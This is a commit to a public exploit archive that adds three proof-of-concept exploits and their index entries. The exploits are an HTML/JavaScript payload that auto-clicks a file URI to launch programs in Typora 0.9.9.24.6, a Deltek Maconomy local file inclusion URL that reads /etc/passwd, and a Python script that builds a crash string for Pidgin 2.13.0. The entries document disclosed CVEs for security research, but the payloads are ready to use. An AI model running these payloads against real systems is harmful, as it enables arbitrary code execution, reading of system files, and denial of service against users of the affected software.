DB: 2019-05-28
3 changes to exploits/shellcodes Pidgin 2.13.0 - Denial of Service (PoC) Typora 0.9.9.24.6 - Directory Traversal Deltek Maconomy 2.2.5 - Local File Inclusion
This commit is contained in:
parent
0d68572071
commit
18a676ca3b
4 changed files with 77 additions and 0 deletions
38
exploits/macos/remote/46932.txt
Normal file
38
exploits/macos/remote/46932.txt
Normal file
|
@ -0,0 +1,38 @@
|
||||||
|
Exploit Title: Code execution via path traversal
|
||||||
|
# Date: 17-05-2019
|
||||||
|
# Exploit Author: Dhiraj Mishra
|
||||||
|
# Vendor Homepage: http://typora.io
|
||||||
|
# Software Link: https://typora.io/download/Typora.dmg
|
||||||
|
# Version: 0.9.9.24.6
|
||||||
|
# Tested on: macOS Mojave v10.14.4
|
||||||
|
# CVE: CVE-2019-12137
|
||||||
|
# References:
|
||||||
|
# https://nvd.nist.gov/vuln/detail/CVE-2019-12137
|
||||||
|
# https://github.com/typora/typora-issues/issues/2505
|
||||||
|
|
||||||
|
Summary:
|
||||||
|
Typora 0.9.9.24.6 on macOS allows directory traversal, for the execution of
|
||||||
|
arbitrary programs, via a file:/// or ../ substring in a shared note via
|
||||||
|
abusing URI schemes.
|
||||||
|
|
||||||
|
Technical observation:
|
||||||
|
A crafted URI can be used in a note to perform this attack using file:///
|
||||||
|
has an argument or by traversing to any directory like
|
||||||
|
(../../../../something.app).
|
||||||
|
|
||||||
|
Since, Typro also has a feature of sharing notes, in such case attacker
|
||||||
|
could leverage this vulnerability and send crafted notes to the
|
||||||
|
victim to perform any further attack.
|
||||||
|
|
||||||
|
Simple exploit code would be:
|
||||||
|
|
||||||
|
<body>
|
||||||
|
<a href="file:\\\Applications\Calculator.app" id=inputzero>
|
||||||
|
<img src="someimage.jpeg" alt="inputzero" width="104" height="142">
|
||||||
|
</a>
|
||||||
|
<script>
|
||||||
|
(function download() {
|
||||||
|
document.getElementById('inputzero').click();
|
||||||
|
})()
|
||||||
|
</script>
|
||||||
|
</body>
|
13
exploits/multiple/webapps/46931.txt
Normal file
13
exploits/multiple/webapps/46931.txt
Normal file
|
@ -0,0 +1,13 @@
|
||||||
|
# Exploit Title: Maconomy Erp local file include
|
||||||
|
# Date: 22/05/2019
|
||||||
|
# Exploit Author: JameelNabbo
|
||||||
|
# Website: jameelnabbo.com
|
||||||
|
# Vendor Homepage: https://www.deltek.com
|
||||||
|
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
|
||||||
|
# CVE: CVE-2019-12314
|
||||||
|
POC:
|
||||||
|
|
||||||
|
POC:
|
||||||
|
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
|
||||||
|
Example
|
||||||
|
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
|
23
exploits/windows/dos/46930.py
Executable file
23
exploits/windows/dos/46930.py
Executable file
|
@ -0,0 +1,23 @@
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
# Exploit Title: Pidgin 2.13.0 - Denial of Service (PoC)
|
||||||
|
# Date: 24/05/2019
|
||||||
|
# Author: Alejandra Sánchez
|
||||||
|
# Vendor Homepage: https://pidgin.im/
|
||||||
|
# Software https://cfhcable.dl.sourceforge.net/project/pidgin/Pidgin/2.13.0/pidgin-2.13.0.exe
|
||||||
|
# Version: 2.13.0
|
||||||
|
# Tested on: Windows 7, Windows 10
|
||||||
|
|
||||||
|
# Proof of Concept:
|
||||||
|
# 1.- Run the python script 'pidgin.py', it will create a new file 'pidgin.txt'
|
||||||
|
# 2.- Open Pidgin
|
||||||
|
# 3.- Go to 'Accounts' > 'Manage Accounts'
|
||||||
|
# 4.- Click 'Add...', paste the content of pidgin.txt into the field 'Username',
|
||||||
|
# into the field 'Password' write anything, e.g. 1234 and click 'Add'
|
||||||
|
# 5.- On the taskbar, click show hidden icons, right click on Pingin and select 'Join Chat...'
|
||||||
|
# 6.- Now click 'Join' and crashed
|
||||||
|
|
||||||
|
buffer = "\x41" * 1000
|
||||||
|
|
||||||
|
f = open ("pidgin.txt", "w")
|
||||||
|
f.write(buffer)
|
||||||
|
f.close()
|
|
@ -6467,6 +6467,7 @@ id,file,description,date,author,type,platform,port
|
||||||
46926,exploits/windows/dos/46926.py,"Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
|
46926,exploits/windows/dos/46926.py,"Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
|
||||||
46927,exploits/windows/dos/46927.py,"Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
|
46927,exploits/windows/dos/46927.py,"Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)",2019-05-24,"Victor Mondragón",dos,windows,
|
||||||
46929,exploits/windows/dos/46929.py,"Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)",2019-05-24,Achilles,dos,windows,
|
46929,exploits/windows/dos/46929.py,"Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)",2019-05-24,Achilles,dos,windows,
|
||||||
|
46930,exploits/windows/dos/46930.py,"Pidgin 2.13.0 - Denial of Service (PoC)",2019-05-27,"Alejandra Sánchez",dos,windows,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||||
|
@ -17465,6 +17466,7 @@ id,file,description,date,author,type,platform,port
|
||||||
46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,
|
46880,exploits/php/remote/46880.rb,"GetSimpleCMS - Unauthenticated Remote Code Execution (Metasploit)",2019-05-20,Metasploit,remote,php,
|
||||||
46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,
|
46915,exploits/php/remote/46915.rb,"Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)",2019-05-23,Metasploit,remote,php,
|
||||||
46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows,
|
46928,exploits/windows/remote/46928.html,"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption",2019-05-24,"Simon Zuckerbraun",remote,windows,
|
||||||
|
46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,
|
||||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||||
|
@ -41349,3 +41351,4 @@ id,file,description,date,author,type,platform,port
|
||||||
46903,exploits/php/webapps/46903.txt,"Horde Webmail 5.2.22 - Multiple Vulnerabilities",2019-05-22,InfinitumIT,webapps,php,
|
46903,exploits/php/webapps/46903.txt,"Horde Webmail 5.2.22 - Multiple Vulnerabilities",2019-05-22,InfinitumIT,webapps,php,
|
||||||
46910,exploits/php/webapps/46910.txt,"Nagios XI 5.6.1 - SQL injection",2019-05-23,JameelNabbo,webapps,php,
|
46910,exploits/php/webapps/46910.txt,"Nagios XI 5.6.1 - SQL injection",2019-05-23,JameelNabbo,webapps,php,
|
||||||
46921,exploits/php/webapps/46921.sh,"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC",2019-05-24,"Todor Donev",webapps,php,
|
46921,exploits/php/webapps/46921.sh,"Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC",2019-05-24,"Todor Donev",webapps,php,
|
||||||
|
46931,exploits/multiple/webapps/46931.txt,"Deltek Maconomy 2.2.5 - Local File Inclusion",2019-05-27,JameelNabbo,webapps,multiple,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue